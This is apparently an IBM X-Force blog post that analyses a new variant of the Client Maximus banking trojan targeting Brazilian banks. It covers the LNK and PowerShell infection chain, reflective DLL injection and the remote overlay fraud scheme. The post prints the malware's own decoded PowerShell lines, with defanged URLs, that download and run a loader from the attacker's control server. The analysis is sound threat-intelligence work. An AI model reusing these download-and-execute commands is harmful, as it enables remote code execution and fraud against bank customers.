In January 2017, IBM X-Force research reported the development of a new remote-access malware code targeting Brazilian banks. The malware, dubbed Client Maximus, was observed in ongoing campaigns and continues to target online banking users in the country. The development of Client Maximus, which is believed to be commercially available in Brazilian fraud and cybercrime communities, continues as new variants of the malware emerge.
IBM X-Force recently analyzed a new and upgraded version of the malware. Client Maximus appears to have been written specifically for attacks against Brazilian banks. Analysis of different components of this code led our researchers to the overall understanding of the growing sophistication of cybercrime tools in Brazil.
Read the white paper: Shifting the balance of power with cognitive fraud prevention
Initial Malware Download
The initial infection routine begins with an obfuscated LNK file that runs CMD.exe /c with PowerShell.exe as a parameter. PowerShell, in turn, gets its own parameter, a Base64-encoded script, which is immediately executed before it downloads another file from the attacker’s control server and executes it.
An interesting note about the initial LNK file being used by Client Maximus is that the complete Base64-encoded PowerShell script is not visible in the Windows user interface, even when clicking “Properties” on the file. It is only visible to a dedicated ShellLink parser or hex editor.
We decoded the PowerShell code from its Base64 format and received the following:
CleAr-HoST;iEX(NEW-oBjEcT nET.webClIEnT).DoWnLOaDSTRiNg(‘hxxps://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8MHVvRA%3D%3D%’)
|
Scroll to view full table
The resulting downloaded file is yet another obfuscated PowerShell script that fetches a .NET assembly named “Loader.” That element is dynamically loaded as follows:
$bytes = (New-Object Net.WebClient).DownloadData(“hxxps://1361227624.rsc.cdn77.org/v2/loader.dll”)
[Reflection.Assembly]::Load($bytes)
|
Scroll to view full table
The next step is the execution of what the malware’s developer named a “Go” method on the dynamically loaded assembly (see code in REF _Ref492900569 \h \* MERGEFORMAT Figure 1):
[Loader]::Go(“hxxps://1361227624.rsc.cdn77.org/v2/”,”CpWY”)
|
Scroll to view full table
The “Go” method performs the following checks on the environment as a means to evade discovery by unwanted parties and anti-malware tools:
- Is the IP address inside the Brazilian IP range?
- Scans for the presence of a number of security applications on the endpoint;
- Creates random names for files and folders to be created; and
- Downloads corresponding payload from control server to match either the 32-bit Windows machine or 64-bit version.
After the loader’s run, the original PowerShell script proceeds to create two files:
- A VB script file that will execute the payload once it is downloaded:
- A LNK file (shortcut) to execute the aforementioned VB script.
In the last step before the payload arrives, the PowerShell script executes the LNK file, which, in turn, executes the VBS file:
Start-Process $lnkFileName
|
Scroll to view full table
The Client Maximus Four-Part Payload
The malware’s payload itself comprises four randomly named files. On our sample during the analysis, those files came up as:
File names will vary between variants and machines, as the malware randomly prenames them before actual creation. Let’s have a look at what these components do.
WindowsAnytimeUpgradeResults.exe.config
This file contains only the .NET-supported runtimes for the associated executable file that carries the same name. It is of little value in that sense.
WindowsAnytimeUpgradeResults.exe
This file presents known .NET WinForm software for the legitimate encryption/decryption process of PowerShell scripts, usually by IT administrators. WinForm, or Windows Forms, is a graphical class library included as a part of the Microsoft .NET Framework that provides a platform to write rich client applications for desktop, laptop and tablet PCs. This specific instance is known as PShellExec. In the context of the malware’s operation, it is used to decrypt the heavily obfuscated PowerShell script, noted as 2620343c, using the Zebra Bank Structure (ZBS) file as an argument.
To make debugging more arduous, the malware’s developer ensured that the runtime obfuscation of strings and some junk code is multi-threaded.
2620343c.zbs
ZBS files are typically used for data structure input/output. This file is, in reality, .NET-emitted code saved as a compressed byte array and encoded in Base64. This assembly, called Scripter.exe, is also quite heavily obfuscated and is loaded at runtime by the first executable using Assembly.Load(byte[]) and MethodInfo.Invoke().
The output of WindowsAnytimeUpgradeResults.exe is an obfuscated PowerShell script that performs remote loading of a dynamic link library (DLL) into a remote process, practically replacing Windows Loader. This technique, called reflective PE injection, is part of the PowerSploit suite, which offers various other features, such as logon token exfiltration and persistence techniques.
This final PowerShell code creates a new cmd.exe process and uses the DLL above to inject its payload into the legitimate cmd.exe process:
The following diagram gives an overview of the infection routine applied by this new variant of the Client Maximus banking malware:
Logical Attack Flow on the Victim’s Side
Once the endpoint has been successfully infected with the malware, Client Maximus will continually monitor the user’s browsing activity. When the user tries to reach his or her bank’s website — if that bank is on the malware operator’s target list — Client Maximus will go into action.
The malware’s top-level modus operandi is simple, yet effective:
- Upon detecting a matching bank site/application, it launches full-screen overlay images to block the victim’s access to the banking session he or she initiated in the browser. Those screens also communicate fake messages to the victim, using social engineering to keep them waiting while the fraudster initiates a remote-access session to take control of the endpoint.
- Client Maximus leverages remote control capabilities to take over the victim’s device, allowing the attacker to attempt a fraudulent transaction from that trusted endpoint. Moreover, for cases where the victim uses an application, rather than a website, for banking activity, the attacker can access that application on the desktop, see virtual keyboard activity and monitor the user’s actions in real time.
Client Maximus’ modus operandi is not much different from previous malicious code categorized under the remote overlay family. The scheme appears in further detail in our previous blog about Client Maximus.
Brazilian Malware Escalating in Sophistication
In 2017, IBM X-Force is seeing an ongoing escalation of malware codes in Brazil. After collaboration with external parties, it appears that there has been a permanent step-up in sophistication of malware codes.
On top of frequently seeing new Client Maximus variants operated by different actors and the upgrade the malware has recently undergone, X-Force researchers also found a new code being propagated in Brazil. The code is named Vernon, and more information about the malware will be available in the coming week from IBM X-Force.
Banks wishing to protect their customers from evolving threats and cybercrime modus operandi are invited to learn more about IBM Trusteer advanced fraud protection.
Individuals looking for tips on protecting themselves from remote overlay malware and other banking Trojans are invited to read our tips page for staying safer on PC/mobile devices.
We worked with the following MD5 hashes for this blog:
Read the white paper: Shifting the balance of power with cognitive fraud prevention
Principal Consultant, X-Force Cyber Crisis Management, IBM